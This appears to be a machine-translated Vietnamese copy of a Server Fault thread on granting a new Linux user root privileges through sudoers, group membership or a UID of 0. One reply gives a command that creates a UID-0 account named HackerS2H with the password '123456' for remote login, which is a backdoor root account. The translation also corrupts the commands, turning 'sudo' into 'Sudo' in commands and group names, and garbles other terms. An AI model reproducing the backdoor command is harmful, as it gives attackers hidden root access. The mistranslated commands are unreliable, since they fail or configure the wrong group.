it-swarm-vi.tech

thêm người dùng mới với quyền truy cập root trong Linux

Tôi muốn thêm người dùng mới và có/cấp cho người dùng mới đó để có tất cả quyền truy cập root, làm thế nào tôi có thể làm điều đó?

Tôi đã làm Sudo adduser --system testuser nhưng điều này không hoạt động như tôi mong đợi.

Cảm ơn vì sự giúp đỡ.

31
seg.server.fault

Thực tế có ba cách bạn có thể làm điều này: cách đúng, cách sai và cách xấu.

Đầu tiên, tạo một bình thường tài khoản người dùng.

adduser username

Sau đó chọn một trong các cách sau:


Đúng cách

Tạo một mục Sudo cho nhóm wheel trong /etc/sudoers như thế này:

## Allows people in group wheel to run all commands
%wheel  ALL=(ALL)       ALL

Hoặc cho các phiên bản "hiện đại":

## Allows people in group sudoers to run all commands
%sudoers ALL=(ALL)       ALL

Sau đó thêm người dùng vào nhóm wheel. Thêm và xóa người dùng bằng quyền riêng tư quản trị giờ trở thành chức năng ghi nhớ để thêm họ vào bánh xe, thay vì tạo một mục trong Sudo. Điều tuyệt vời khi sử dụng bánh xe là bạn có thể mở rộng cơ chế này thành các chương trình xác thực khác hỗ trợ các nhóm, tức là winbind/Active Directory và gặt hái những lợi ích trong quy trình. Bạn sẽ thực hiện điều này bằng cách ánh xạ bánh xe tới một nhóm trong lược đồ xác thực có đặc quyền quản trị viên.

Lưu ý rằng một số phân phối sử dụng các tài khoản quản trị khác nhau. Bánh xe là cách tiếp cận "truyền thống" cho vấn đề này, nhưng bạn có thể gặp phải admin, adm và các tài khoản nhóm khác phục vụ cùng mục đích.

Chỉnh sửa tiếp theo :

Tôi phải đưa ra một điểm cho Bart Silverstrim để chỉ ra rằng Ubuntu sử dụng admin làm nhóm cho mục đích này. Anh ấy đã nhận được điều này trước tiên, mặc dù lúc đó tôi không nhận thấy thẻ Ubuntu. Một lần nữa, tất cả phụ thuộc vào phân phối của bạn đang sử dụng.


Con đường xấu xí

Tạo một mục Sudo cho tài khoản người dùng được đề cập và cung cấp quyền truy cập hoàn tất. Một lần nữa, bạn tạo mục trong /etc/sudoers như thế này:

## Allows just user "username" to run all commands as root
username    ALL=(ALL)    ALL

Đã thêm: ## Đối với phiên bản Ubuntu: tên người dùng ALL = (ALL: ALL)

Điều này thật tuyệt nếu bạn chỉ có một (hoặc hai) tài khoản bình thường. Thật tệ khi bạn có hàng trăm tài khoản trên nhiều trang web (địa vật lý) và phải liên tục duy trì tệp Sudo.


Con đường sai

Bạn có thể chỉnh sửa /etc/passwd tập tin và thay đổi ID tài khoản người dùng từ bất kỳ số nào, thành 0. Đúng vậy, zero.

username:x:0:502::/home/username:/bin/bash

Xem mục thứ ba là số không? Khi bạn đăng nhập vào tài khoản đó, bạn, với tất cả các mục đích hiệu quả, root. Tôi không khuyến nghị điều này. Nếu bạn không nhớ "bạn" là ai, bạn có thể tạo tất cả các loại tàn phá khi bạn bắt đầu tạo và chạm vào các tệp như root. Bạn cũng có thể thêm tên người dùng của mình vào nhóm root. Điều này có tác dụng tương tự đối với truy cập tệp nhưng nó tạo ra các vấn đề khác; các chương trình sẽ nhận thấy bạn không phải userroot và từ chối chạy, nhưng bạn sẽ có quyền truy cập vào các tệp thuộc về nhómroot.

Nếu bạn đã làm điều này, bạn đã sử dụng vipw thay vì chỉ chỉnh sửa với vi, phải không? (hoặc bất kể trình soạn thảo văn bản yêu thích của bạn là gì) Sau tất cả, một lỗi đánh máy trong tệp này có thể khóa bạn khỏi hệ thống của bạn - và điều đó có nghĩa là một chuyến thăm vật lý đến máy tính có vấn đề với đĩa sửa chữa ...

62
Avery Payne

Tôi đã sử dụng cái này trong nhiều năm và đó là cách # 1 được đề xuất để thêm một sudoer trên AskUbfox :

adduser existinguser Sudo

Đơn giản hơn nhiều so với chỉnh sửa tệp và dễ dàng đưa vào tập lệnh Shell để cài đặt không giám sát.

Nếu bạn muốn tạo người dùng và cấp đặc quyền Sudo, bạn có thể làm điều đó trong một dòng như thế này:

useradd newuser -m -G Sudo
passwd newuser

-m đã tạo một thư mục chính và -G chỉ định một nhóm bổ sung.

3
Dan Dascalescu

và với điều này là 100%:

adduser -u 0 -g root -G root -s /bin/bash -r HackerS2H -p 123456

và kết nối với máy chủ PuTTY và ip

2
hacker-s2h

Vâng, bạn có thể tạo người dùng với adduser, xem man adduser.
[.___.] Sau khi bạn có thể thêm nó vào nhóm đặc quyền như root hoặc wheel. Nhưng tôi nghĩ rằng cách được khuyến nghị nhất để có một số quyền là sử dụng Sudo.

1
Ali Mezgani

bạn có thể thực hiện:

#useradd -m -g root alex

nó tạo ra một người dùng Alex với một thư mục chính thuộc nhóm gốc

1
Razique

Ngoài câu trả lời của Avery Payne: trong Ubuntu, bạn có thể muốn nó như vậy:

%Sudo   ALL=(ALL:ALL) ALL

Và không như vậy:

%Sudo    ALL=(ALL) ALL
1
hukeping

Cách "xấu xí và lộn xộn" là chỉnh sửa/etc/passwd để có UID = 0 AND GID = 0 cho người dùng mới. Nhưng điều này đặt ra RẤT NHIỀU rủi ro bảo mật . Bạn có biết rằng nếu anh ấy cũng root, anh ấy có thể vô hiệu hóa tài khoản của bạn, thay đổi mật khẩu của bạn, biến bạn thành "người dùng chuẩn" ... đúng không? Vậy tại sao không chỉ cho anh ta tài khoản của riêng bạn?

Bạn có thể nghiên cứu cách suid ( http://en.wikipedia.org/wiki/setuid ) hoạt động nếu bạn muốn cấp cho anh ta quyền truy cập root chỉ với một vài lệnh.

0
quamis